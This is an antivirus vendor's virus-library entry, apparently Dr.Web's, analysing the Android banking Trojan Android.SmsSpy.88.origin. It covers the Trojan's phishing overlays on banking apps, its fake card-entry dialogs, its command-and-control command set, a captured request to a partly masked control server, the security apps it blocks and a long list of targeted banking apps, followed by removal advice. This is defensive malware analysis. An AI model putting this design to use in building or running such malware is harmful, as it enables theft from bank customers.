Bibliothèque
Ma bibliothèque

+ Ajouter à la bibliothèque

Contacter-nous !
Support 24/24 | Rules regarding submitting

Nous téléphoner

0 825 300 230

Forum

Vos requêtes

  • Toutes : -
  • Non clôturées : -
  • Dernière : le -

Nous téléphoner

0 825 300 230

Profil

Android.SmsSpy.88.origin

Added to the Dr.Web virus database: 2015-08-26

Virus description added:

SHA1:

b607191448d0c31ea7d4a4ce9a0268cc72a23701
c80ce28bae65d06c6855b0e2647f752a3b7c4fbe
18747eaf81daaf51abe76749dc6fa89937e2a6f5

A Trojan for Android designed to steal user login credentials needed to access online banking programs and to steal money from victims’ bank accounts. Android.SmsSpy.88.origin is distributed under the guise of benign applications—for example, Adobe Flash Player.

screen #drweb

When launched, the Trojan prompts the user to grant it administrative privileges:

screen #drweb

The Trojan is distributed under the guise of a benign application, for example, Adobe Flash Player. Once launched, the Trojan prompts the user to grant it administrator privileges. It then turns on the Wi-Fi module and checks every second whether a Wi-Fi or cellular connection has been established. If no connection is made, Android.SmsSpy.88.origin enables these communication channels once again.

Then the Trojan sends the following information to the command and control server:

  • Infected device's unique identifier generated by the Trojan
  • IMEI identifier
  • Current system language
  • Mobile network operator
  • OS version
  • Mobile device model
  • Cell phone number

Stealing authentication information

The configuration file of Android.SmsSpy.88.origin contains a list of online banking applications and links to phishing dialog templates for these applications. For example:

  • "com.paypal.android.p2pmobile" – "http://******merti.com/333/l/pl/paypal.php"
  • "de.commerzbanking.mobil" – "http://******merti.com/333/l/de/06.php"
  • "com.ing.diba.mbbr2" – "http://******merti.com/333/l/de/13.php"
  • "de.ing_diba.kontostand" – "http://******merti.com/333/l/de/13.php"
  • "de.fiducia.smartphone.android.banking.vr" – "http://******merti.com/333/l/de/15.php"

Android.SmsSpy.88.origin keeps track of when any of the above-listed applications are launched. If a launch is detected, the Trojan downloads a phishing input form from the server and displays it on top of the running application. All information entered by the user is then sent to cybercriminals. Phishing dialogs may look as follows:

screen #drweb screen #drweb screen #drweb

Stealing credit card information

Android.SmsSpy.88.origin also attempts to steal user bank card information by tracking the launch of the following applications specified in its configuration (this list can different application names depending on the Trojan’s modification):

  • com.android.vending;
  • com.viber.voip;
  • com.whatsapp;
  • com.skype.raider;
  • com.facebook.orca;
  • com.facebook.katana;
  • com.instagram.android;
  • com.android.chrome;
  • com.twitter.android;
  • com.google.android.gm;
  • com.android.calendar;
  • jp.naver.line.android.

Once the Trojan detects that one of the above-mentioned applications is running, it displays a bogus dialog resembling the one used to make purchases on Google Play, prompting the user to enter their bank card information:

screen #drweb screen #drweb

All the entered information is then transmitted to the server.

Command executing

Android.SmsSpy.88.origin can receive the following commands from the server:

  • rent&&&—start intercepting all incoming SMS messages;
  • sms_stop&&&—stop intercepting incoming SMS messages;
  • sent&&&—send a text message;
  • ussd&&&—send the USSD request;
  • delivery&&&—send SMS messages to all contact list numbers;
  • apiserver—change the address of the command and control server;
  • appmass—send an MMS message;
  • windowStop—add a specified application to the exclusion list so that when that application is launched, a phishing dialog is not displayed;
  • windowStart—delete a specified application from the exclusion lists;
  • windowsnew—download an updated executable file containing a list of attacked applications from the server;
  • UpdateInfo—send information about all installed applications to the server;
  • freedialog—display a template-based dialog using WebView (this command is applied to activate the screen lock function)
  • freedialogdisable—cancel the display of the WebView dialog;
  • adminPhone—change the phone number used to send SMS messages that repeat commands;
  • killStart—set the password for ScreenLock;
  • killStop—clear the password from ScreenLock;
  • upload_sms—send all saved SMS messages to the server;
  • notification—display a notification with the received parameters.

The Trojan can also receive the rent&&&, sent&&&, ussd&&&, killStart, and killStop commands as text messages from cybercriminals.

If a command is executed successfully, the malicious program reports this information to the server by sending the POST request:


POST  HTTP/1.1 http://******merti.com/333/set_result.php
Content-Length: 61
Content-Type: application/x-www-form-urlencoded
Host: ******merti.com
Connection: Keep-Alive
bot_id=**********260a5fc56212793aca5387&result=windowStart+OK

Resistance to anti-virus software

Android.SmsSpy.88.origin tries to hinder the work of some anti-virus programs and service utilities, preventing them from launching. Depending on the Trojan modification involved, these programs can include:

  • com.cleanmaster.security;
  • com.cleanmaster.mguard;
  • com.piriform.ccleaner;
  • com.cleanmaster.mguard_x86;
  • com.cleanmaster.sdk;
  • com.cleanmaster.boost;
  • com.drweb;
  • com.qihoo.security;
  • com.kms.free;
  • com.eset.ems2.gp;
  • com.qihoo.security.lite;
  • com.symantec.mobilesecurity;
  • com.dianxinos.optimizer.duplay.

Names of banking applications attacked

The following online banking applications are currently known to be attacked by the Trojan:

  • at.bawag.mbanking
  • at.easybank.mbanking
  • at.spardat.netbanking
  • at.volksbank.volksbankmobile
  • au.com.bankwest.mobile
  • au.com.ingdirect.android
  • au.com.nab.mobile
  • Citibank.CZ
  • com.akbank.android.apps.akbank_direkt
  • com.arkea.android.application.cmb
  • com.arkea.android.application.cmso2
  • com.bankaustria.android.olb
  • com.bbva.bbvacontigo
  • com.bbva.bbvawallet
  • com.bbva.nxt_tablet
  • com.boursorama.android.clients
  • com.cacf.MonCACF
  • com.caisseepargne.android.mobilebanking
  • com.cajamar.Cajamar
  • com.chase.sig.android
  • com.cic_prod.bad
  • com.citi.citimobile
  • com.citiuat
  • com.cm_prod.bad
  • com.comarch.mobile
  • com.commbank.netbank
  • com.CreditAgricole
  • com.db.mm.deutschebank
  • com.discoverfinancial.mobile
  • com.finansbank.mobile.cepsube
  • com.fullsix.android.labanquepostale.accountaccess
  • com.garanti.cepsubesi
  • com.getingroup.mobilebanking
  • com.getingroup.mobilebanking
  • com.groupama.toujoursla
  • com.grppl.android.shell.CMBlloydsTSB73
  • com.grppl.android.shell.halifax
  • com.idamob.tinkoff.android
  • com.infonow.bofa
  • com.ing.diba.mbbr2
  • com.IngDirectAndroid
  • com.isis_papyrus.raiffeisen_pay_eyewdg
  • com.konylabs.CBHU
  • com.konylabs.cbplpat
  • com.lbp.peps
  • com.macif.mobile.application.android
  • com.ocito.cdn.activity.creditdunord
  • com.paypal.android.p2pmobile
  • com.pozitron.iscep
  • com.regions.mobbanking
  • com.starfinanz.mobile.android.dkbpushtan
  • com.starfinanz.smob.android.sbanking
  • com.starfinanz.smob.android.sfinanzstatus
  • com.tmobtech.halkbank
  • com.usaa.mobile.android.usaa
  • com.vakifbank.mobile
  • com.ykb.android
  • com.ziraat.ziraatmobil
  • de.adesso.mobile.android.ga
  • de.adesso.mobile.android.gad
  • de.comdirect.android
  • de.commerzbanking.mobil
  • de.consorsbank
  • de.dkb.portalapp
  • de.fiducia.smartphone.android.banking.vr
  • de.ing_diba.kontostand
  • de.postbank.finanzassistent
  • es.bancopopular.android.lanzadera
  • es.bancosantander.apps
  • es.lacaixa.mobile.android.newwapicon
  • eu.eleader.mobilebanking.pekao
  • eu.eleader.mobilebanking.raiffeisen
  • fr.axa.monaxa
  • fr.banquepopulaire.cyberplus
  • fr.banquepopulaire.cyberplus.pro
  • fr.creditagricole.androidapp
  • fr.lcl.android.customerarea
  • fr.lemonway.groupama
  • mobi.societegenerale.mobile.lappli
  • mobile.santander.de
  • net.bnpparibas.mescomptes
  • net.inverline.bancosabadell.officelocator.android
  • org.banksa.bank
  • org.stgeorge.bank
  • org.westpac.bank
  • pl.bzwbk.bzwbk24
  • pl.bzwbk.mobile.tab.bzwbk24
  • pl.eurobank
  • pl.ing.ingmobile
  • pl.mbank
  • pl.pkobp.iko
  • ru.alfabank.mobile.android
  • ru.mw
  • ru.sberbankmobile
  • ru.vtb24.mobilebanking.android
  • uk.co.tsb.mobilebank
  • wit.android.bcpBankingApp.millenniumPL

News about the Trojan

Recommandations pour le traitement


Android

  1. Si votre appareil mobile fonctionne correctement, veuillez télécharger et installer sur votre appareil mobile le produit antivirus gratuit Dr.Web для Android Light. Lancez un scan complet et suivez les recommandations sur la neutralisation des menaces détectées.
  2. Si l'appareil mobile est bloqué par le Trojan de la famille Android.Locker (un message sur une violation grave de la loi ou une demande de rançon s’affichent sur l'écran de l'appareil mobile), procédez comme suit :
    • démarrez votre Smartphone ou votre tablette en mode sans échec (si vous ne savez pas comment faire, consultez la documentation de l'appareil mobile ou contactez le fabricant) ;
    • puis téléchargez et installez sur votre appareil contaminé le produit antivirus gratuit Dr.Web для Android Light et lancez un scan complet puis suivez les recommandations sur la neutralisation des menaces détectées ;
    • Débranchez votre appareil et rebranchez-le.

En savoir plus sur Dr.Web pour Android